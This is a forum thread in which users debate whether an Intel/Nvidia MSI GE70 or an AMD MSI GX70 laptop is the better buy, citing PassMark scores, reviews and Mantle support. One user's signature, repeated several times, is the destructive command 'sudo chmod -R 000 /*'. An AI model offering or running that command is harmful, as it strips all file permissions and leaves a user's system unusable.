Same price range, AMD or Intel/Nvidia?

I found two laptops in the same price range from MSI, the only difference being one has an Intel CPU and an Nvidia GPU whereas the other has an AMD CPU and GPU. Which one do you think is better?

MSI GE70:

- Intel i7-4710HQ

- Nvidia GTX860M 2GB

MSI GX70:

- AMD A10-5750M

- AMD Radeon HD8970M 2GB

The stone cannot know why the chisel cleaves it; the iron cannot know why the fire scorches it. When thy life is cleft and scorched, when death and despair leap at thee, beat not thy breast and curse thy evil fate, but thank the Builder for the trials that shape thee.

The GE70 is faster cpuwise, but the graphics in the GX70 absolutely destroy the 860m.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

For the CPU the GE70 is light-years ahead the GX70. But the HD8970 is much stronger than the GTX860. 

The GE70 is faster cpuwise, but the graphics in the GX70 absolutely destroy the 860m.

EDIT: I did a stupid. 

Amd cpu's in laptops suck!

They are actually pretty good for the price and don't consume a lot of power. Amd got it right with their apu design, especially considering faster but more expensive cpus like that i7 make next to no difference in gaming, which is what these laptops seem to be all about.

sudo chmod -R 000 /*

You messed GE70 and GX70 up. You meant GX70 at the beginning and GE70 at the end. 

Check the names again, the GE is the one with the i7

sudo chmod -R 000 /*

The GE70 has a CPU with a passmark score of 8058

The GX70 has a CPU with a passmark score of 3652

Source

The GX70 has a better GPU according to GPUBOSS.

I would take the GE70 hands down because of the immensely superior CPU, and still reasonable (but weaker) GPU, I believe this to be the best decision for a laptop, I would much rather have a laptop with a better CPU.

Check the names again, the GE is the one with the i7

Ups. I'm a derp. 

They are actually pretty good for the price and don't consume a lot of power. Amd got it right with their apu design, especially considering faster but more expensive cpus like that i7 make next to no difference in gaming, which is what these laptops seem to be all about.

they bottleneck gpu's badly

they bottleneck gpu's badly

Show me a benchmark where it does, "badly".

sudo chmod -R 000 /*

Show me a benchmark where it does, "badly".

They just do even the 8350 you don't realy see it in a benchmark but you just feel it.

And there loads of reviews saying that this is nice laptop with a beefy gpu but it's just being bottlenecked.

They just do even the 8350 you don't realy see it in a benchmark but you just feel it.

And there loads of reviews saying that this is nice laptop with a beefy gpu but it's just being bottlenecked.

Show us some evidence, at the moment you're just talking out of your ass.

Case: Phanteks Enthoo Pro | PSU: Enermax Revolution87+ 850W | Motherboard: MSI Z97 MPOWER MAX AC | GPU 1: MSI R9 290X Lightning | CPU: Intel Core i7 4790k | SSD: Samsung SM951 128GB M.2 | HDDs: 2x 3TB WD Black (RAID1) | CPU Cooler: Silverstone Heligon HE01 | RAM: 4 x 4GB Team Group 1600Mhz

The GE70 has a CPU with a passmark score of 8058

The GX70 has a CPU with a passmark score of 3652

Source

The GX70 has a better GPU according to GPUBOSS.

I would take the GE70 hands down because of the immensely superior CPU, and still reasonable (but weaker) GPU, I believe this to be the best decision for a laptop.

The A10 isn't going to bottleneck the better performing AMD GPU, it doesn't matter with CPU's in laptop's. I severely doubt a lot of people do CPU intensive tasks on a laptop anyway.

CPU: Intel Core i7 4790K @ 4.7GHz, 1.3v with Corsair H100i - Motherboard: MSI MPOWER Z97 MAX AC - RAM: 2x4GB G.Skill Ares @ 2133 - GPU1: Sapphire Radeon R9-290X BF4 Edition with NZXT Kraken G10 with a Corsair H55 AIO @ 1140/1650 GPU2: PowerColor Radeon R9-290X OC Edition with NZXT Kraken G10 with a Corsair H55 AIO @ 1140/1650 - SSD: 256GB OCZ Agility 4 - HDD: 1TB Samsung HD103SJ- PSU: SuperFlower Leadex GOLD 1300w  - Case: NZXT Switch 810 (White) - Case fans: NZXT Blue LED Fans- Keyboard: Steelseries Apex Gaming Keyboard - Mouse: Logitech G600 - Heaphones: Logitech G930 - Monitors: ASUS PB287Q and Acer G246HYLbd -  Phone: Sony Xperia Z1

The comparison in itself is extremely difficult, considering you are comparing the laptop equivalents of the i5 4670 and A10 5700 (performance wise), while comparing the laptop equivalents of the GTX 750 Ti and R9 270 (performance wise, very rough estimates). For gaming, the performance edge is dependent on whether the application is CPU-intensive or GPU-intensive. If the game is CPU-int, the Intel rig will do better. If the other way around, the AMD rig will pull ahead.

Nevertheless, they will both suffice as gaming rigs, but the Intel/NVIDIA machine will possibly run cooler and have longer battery life. Take your own decision from there.

Main Rig: CPU: AMD Ryzen 7 5800X | RAM: 32GB (2x16GB) KLEVV CRAS XR RGB DDR4-3600 | Motherboard: Gigabyte B550I AORUS PRO AX | Storage: 512GB SKHynix PC401, 1TB Samsung 970 EVO Plus, 2x Micron 1100 256GB SATA SSDs | GPU: EVGA RTX 3080 FTW3 Ultra 10GB | Cooling: ThermalTake Floe 280mm w/ be quiet! Pure Wings 3 | Case: Sliger SM580 (Black) | PSU: Lian Li SP 850W

Server: CPU: AMD Ryzen 3 3100 | RAM: 32GB (2x16GB) Crucial DDR4 Pro | Motherboard: ASUS PRIME B550-PLUS AC-HES | Storage: 128GB Samsung PM961, 4TB Seagate IronWolf | GPU: AMD FirePro WX 3100 | Cooling: EK-AIO Elite 360 D-RGB | Case: Corsair 5000D Airflow (White) | PSU: Seasonic Focus GM-850

Miscellaneous: Dell Optiplex 7060 Micro (i5-8500T/16GB/512GB), Lenovo ThinkCentre M715q Tiny (R5 2400GE/16GB/256GB), Dell Optiplex 7040 SFF (i5-6400/8GB/128GB)

Show us some evidence, at the moment you're just talking out of your ass.

-___-  Look for reviews about the laptop loads of good reviewers say it's being bottlenecked.

I am not going to start this discussion again just try some heavy games and you will feel it directly. 

-___-  Look for reviews about the laptop loads of good reviewers say it's being bottlenecked.

I am not going to start this discussion again just try some heavy games and you will feel it directly. 

You will only notice a bottleneck like that on games that are terribly optimised and CPU intensive.

CPU: Intel Core i7 4790K @ 4.7GHz, 1.3v with Corsair H100i - Motherboard: MSI MPOWER Z97 MAX AC - RAM: 2x4GB G.Skill Ares @ 2133 - GPU1: Sapphire Radeon R9-290X BF4 Edition with NZXT Kraken G10 with a Corsair H55 AIO @ 1140/1650 GPU2: PowerColor Radeon R9-290X OC Edition with NZXT Kraken G10 with a Corsair H55 AIO @ 1140/1650 - SSD: 256GB OCZ Agility 4 - HDD: 1TB Samsung HD103SJ- PSU: SuperFlower Leadex GOLD 1300w  - Case: NZXT Switch 810 (White) - Case fans: NZXT Blue LED Fans- Keyboard: Steelseries Apex Gaming Keyboard - Mouse: Logitech G600 - Heaphones: Logitech G930 - Monitors: ASUS PB287Q and Acer G246HYLbd -  Phone: Sony Xperia Z1

I found this review on notebookcheck.com http://www.notebookcheck.net/Review-MSI-GX70H-A108972811B-Notebook.99516.0.html

The review is pretty negative about the GX70 and the comments underneath follow the same tune. I'll go with Intel and Nvidia on this one.

The stone cannot know why the chisel cleaves it; the iron cannot know why the fire scorches it. When thy life is cleft and scorched, when death and despair leap at thee, beat not thy breast and curse thy evil fate, but thank the Builder for the trials that shape thee.

Perhaps you know about Mantle? No? Obviously not. Mantle and DirectX 12 will iron out the bottleneck, it was built to be optimised. DirectX 11 is a dog when it comes to multicore load balancing.

If you live in the now: GE70

It will perform much better on current generation of games that rely on DirectX 11 and below.

If you live in the future and want to therefor be FUTUREproof: GX70

Will perform better in some newer titles as a lot of them have Mantle support. When DirectX 12 comes out the GX70 is probably a better bet.

Case: Phanteks Enthoo Pro | PSU: Enermax Revolution87+ 850W | Motherboard: MSI Z97 MPOWER MAX AC | GPU 1: MSI R9 290X Lightning | CPU: Intel Core i7 4790k | SSD: Samsung SM951 128GB M.2 | HDDs: 2x 3TB WD Black (RAID1) | CPU Cooler: Silverstone Heligon HE01 | RAM: 4 x 4GB Team Group 1600Mhz

You will only notice a bottleneck like that on games that are terribly optimised and CPU intensive.

Nah even Bf4 and older games/.

Perhaps you know about Mantle? No? Obviously not. Mantle and DirectX 12 will iron out the bottleneck, it was built to be optimised. DirectX 11 is a dog when it comes to multicore load balancing.

Yes I know :P that's true but how many games do support Mantle these days? 

But still even tho the intel laptop has a bit slower gpu it still outperforms the amd one.

Clearly dealing with an AMD fanboy here have fun mate, I have had AMD for years but even with a big oc on a 8320 I noticed a miss in performance.

Nah even Bf4 and older games/.

Yes I know :P that's true but how many games do support Mantle these days? 

But still even tho the intel laptop has a bit slower gpu it still outperforms the amd one.

Clearly dealing with an AMD fanboy here have fun mate, I have had AMD for years but even with a big oc on a 8320 I noticed a miss in performance.

I personally prefer AMD and unlike some i explain my reasoning. ;)

Oh come on... don't go fanboy on me... the numbers are what counts, if benchmarks say it's the same in  game, it's the same in that game, you don't "feel" the difference. That amd laptop will destroy the intel one in games, no question about that. It's just faster, and even if the gpu is being slightly bottlenecked (only in cpu intensive games though) it's still faster than the 860m.

@StingBull ^

sudo chmod -R 000 /*

I would avoid the GX70 because the CPU is much weaker and less efficient (more than half slower than the i7). I would also go for better CPU than GPU. And in notebooks, overheating problems is a common issue, and AMD has more power hungry and higher thermals than the green counterpart. For notebooks, Intel & Nvidia was always better at efficiency for battery life.

-end of story

I would avoid the GX70 because the CPU is much weaker and less efficient (more than half slower than the i7). I would also go for better CPU than GPU. And in notebooks, overheating problems is a common issue, and AMD has more power hungry and higher thermals than the green counterpart. For notebooks, Intel & Nvidia was always better at efficiency for battery life.

-end of story

Depends on what the OP is using the laptop for.